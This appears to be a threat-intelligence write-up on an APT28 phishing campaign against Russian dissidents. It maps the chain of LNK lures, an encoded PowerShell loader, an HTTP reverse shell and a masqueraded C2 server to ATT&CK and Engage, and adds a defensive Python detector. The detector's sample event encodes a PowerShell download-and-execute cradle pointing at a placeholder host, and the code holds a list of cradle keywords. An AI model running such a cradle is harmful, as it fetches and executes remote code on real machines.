The Bear and the Shell

Subject: The Bear and the Shell

Tactics: TA0011 Command and Control, TA0005 Defense Evasion, TA0002 Execution, TA0010 Exfiltration, TA0001 Initial Access

Technique: T1071.001 Application Layer Protocol: Web Protocols, T1059.001 Command and Scripting Interpreter: PowerShell, T1041 Exfiltration Over C2 Channel, T1036 Masquerading, T1566.001 Phishing: Spearphishing Attachment

Procedure:

T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files with LNK files disguised as PDFs. When opened, these executed a PowerShell script to install a reverse shell.

T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.

T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.

T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.

T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.
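As an added defender-side example (not code from the original report or from Cluster25), the following Python triage routine runs over constructed Sysmon-style (Event ID 1) process-creation events and flags the T1566.001 to T1059.001 chain described above: PowerShell spawned by Explorer (the way an LNK double-click launches it) carrying a Base64-encoded command that decodes to a download cradle. The event records, the field names used and the C2 hostname are constructed placeholders, not indicators from the report.

```python
import base64
import re

# Constructed Sysmon-style (Event ID 1) process-creation events; not real telemetry.
# Event 0 mimics the report's chain: Explorer launching an LNK that runs PowerShell
# with a Base64 payload fetching a stage from a C2 posing as a PDF-editing site.
def _enc(cmd: str) -> str:
    # PowerShell -EncodedCommand expects Base64 of UTF-16LE text
    return base64.b64encode(cmd.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -nop -enc " + _enc(
         "IEX (New-Object Net.WebClient).DownloadString('https://pdf-editor.example.invalid/s')")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Admin\deploy.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe readme.txt"},
]

# longest alias first so "-enc" is not consumed by "-e"
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest", "iex", "invoke-expression")

def decode_encoded_command(cmdline: str):
    # Return the decoded -EncodedCommand payload, or None if absent or undecodable
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev: dict) -> dict:
    # Flag PowerShell started by Explorer (LNK-style) with an encoded download cradle
    findings = []
    if not ev["Image"].lower().endswith("powershell.exe"):
        return {"alert": False, "findings": findings, "decoded": None}
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded is not None:
        findings.append("encoded command")
        if any(t in decoded.lower() for t in CRADLE_TOKENS):
            findings.append("download cradle")
    if ev["ParentImage"].lower().endswith("explorer.exe"):
        findings.append("spawned from explorer.exe (LNK-style launch)")
    # two independent indicators are required before raising an alert
    return {"alert": len(findings) >= 2, "findings": findings, "decoded": decoded}
```

The decoded payload is returned alongside the findings so an analyst can inspect the staging URL and block or sinkhole it, which is where the masqueraded C2 site (T1036) becomes visible.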

Vulnerability:

EAV0002 – When adversaries interact with the environment or personas, they are vulnerable to collecting, or in some way interacting with, manipulated or decoy data. In those cases the data may increase their tolerance for imperfections in the environment and improve the overall believability of the ruse.

EAV0007 – When adversaries interact with engagement environments and personas, their future capability, targeting, and/or infrastructure requirements are vulnerable to influence.

Engagement Opportunity:

Organizations can use this opportunity to educate users about phishing threats, implement email security solutions to block malicious attachments, and set up a honeypot to capture the malicious emails and analyze the attacker’s techniques for improved detection and defense.

Threat Actor: APT28

Threat Objective:

To target entities critical of the Russian government and aligned with Russian dissident movements.

Deception Opportunity:

Create decoy email accounts or social media profiles that appear to belong to individuals or organizations critical of the Russian government. These decoys can be used to gather intelligence on the attacker’s techniques and objectives, and to potentially disrupt their operations.

Sensor Data Placement: Application

Observable Level: Core to Adversary-Brought Tool

Scoring Rationale:

The PowerShell script and the HTTP-Shell are specific to the attacker’s toolkit, making them “Core to Adversary-Brought Tool”. The sensor data placement is in both “Application” and “User-Mode” as the attack involves email attachments (application) and execution of scripts (user-mode).

Link to Report: https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition/

Link to Report II.:

Additional Comments:

The use of open-source tools and the attempt to blend in with legitimate web traffic indicate a sophisticated attacker with resources and an understanding of detection techniques.

Possible elements: Deceptive User Account with Canary Tokens

MSG (Pseudocode):

# Malicious Sub-Graph Standard

# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])

# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])

[1]: Initial Access - Spearphishing Attachment - Send spearphishing email with malicious ZIP file containing LNK file disguised as PDF (Core to Adversary-Brought Tool)
[2]: Execution - Command and Scripting Interpreter: PowerShell - Execute PowerShell script to install HTTP-Shell (Core to Adversary-Brought Tool)
[3]: Defense Evasion - Masquerading - Use NASA-themed lure and C2 server disguised as PDF editing site (Core to Adversary-Brought Tool)
[4]: Command and Control - Application Layer Protocol: Web Protocols - Establish HTTP connection to C2 server (Core to Adversary-Brought Tool)
[5]: Exfiltration - Exfiltration Over C2 Channel - Exfiltrate data over HTTP C2 channel (Core to Sub-Technique or Technique)

1 --> 2 (Lack of User Awareness)
2 --> 3 (Lack of User Awareness)
3 --> 4 (Lack of Network Monitoring)
4 --> 5 (Lack of Network Monitoring)

# Pseudocode Standard

# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]

function Initial_Access_Spearphishing_Attachment(target_email):
    # Craft spearphishing email with malicious ZIP file containing LNK file
    # Send email to target_email
    return malicious_lnk_file

function Execution_Command_and_Scripting_Interpreter(malicious_lnk_file):
    # Execute PowerShell script embedded in LNK file
    # Install HTTP-Shell
    return reverse_shell

function Defense_Evasion_Masquerading(reverse_shell):
    # Disguise C2 server as legitimate PDF editing site
    return disguised_C2_server

function Command_and_Control_Application_Layer_Protocol(disguised_C2_server):
    # Establish HTTP connection to disguised_C2_server
    # Use C2 server for communication and data exfiltration
    return exfiltrated_data

function Exfiltration_Exfiltration_Over_C2_Channel(exfiltrated_data):
    # Send exfiltrated_data to C2 server over HTTP
    return success